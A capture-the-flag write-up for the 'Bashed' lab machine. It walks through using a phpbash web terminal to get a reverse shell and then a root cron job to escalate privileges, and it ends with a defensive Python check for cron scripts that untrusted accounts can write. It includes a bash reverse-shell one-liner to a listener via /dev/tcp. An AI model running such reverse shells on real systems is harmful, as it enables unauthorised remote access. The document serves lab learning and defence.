# Bashed!
## @author:M3tr1c_r00t

### Enumeration
Step 1: nmap and Gobuster

Only one port is open, so let's visit it.

The site was working on a feature known as phpbash, which is a kind of terminal emulation in a web page.
After interacting with it for a while, I found a way that I could use to get a reverse shell.
I created a reverse shell bash script:

```bash
# Write the reverse shell one-liner to reverse.sh (10.10.14.99:1234 is the listener)
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.99/1234 0>&1'" > reverse.sh
```

And we got our reverse shell!
We can now read the user flag.
### Priv Esc
Looking around in the user's file system, we find a folder, 'scripts'.
In it there are two files.

On checking out the two files, it seems that test.py is being executed on a cron cycle.

We can replace the file with a Python reverse shell because the script is being run by the root user.

You can find this code in pentestmonkey's cheat sheet.

We open a listener and we get a reverse shell as root!
Get your root flag and done!
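
The weakness behind this step is a root cron job running a script that a lower-privileged account can replace. As an added example (not part of the original writeup), this audit check flags a cron-executed script when the file or any parent directory is owned or writable by an account outside a trusted set; the function name and its parameters are assumptions made for illustration.

```python
import os
import stat
import sys


def writable_by_untrusted(path, trusted_uids=frozenset({0}),
                          trusted_gids=frozenset({0}), stop="/"):
    """Return (path, reason) findings for `path` and each parent up to `stop`.

    A finding means an account outside the trusted sets could modify or
    replace the script before a privileged job executes it.
    """
    findings = []
    current = os.path.realpath(path)
    stop = os.path.realpath(stop)
    while True:
        st = os.stat(current)
        # The owner can always rewrite a file or swap entries in a directory.
        if st.st_uid not in trusted_uids:
            findings.append((current, f"owned by uid {st.st_uid}"))
        # A sticky directory (such as /tmp) stops users from replacing
        # entries they do not own, so its write bits are not a finding.
        sticky = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
        if not sticky:
            if st.st_mode & stat.S_IWOTH:
                findings.append((current, "world-writable"))
            elif st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
                findings.append((current, f"group-writable by gid {st.st_gid}"))
        parent = os.path.dirname(current)
        if current == stop or parent == current:
            return findings
        current = parent


if __name__ == "__main__":
    # Usage: pass the script paths referenced by root's cron entries.
    for script in sys.argv[1:]:
        for where, why in writable_by_untrusted(script):
            print(f"{script}: {where} is {why}")
```

Any finding on a script that root's cron runs means the job should be moved to a root-owned path with no group or world write access.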
### Socials
@instagram:https://instagram.com/Metric_r00t
<br> Twitter:https://twitter.com/M3tr1c_root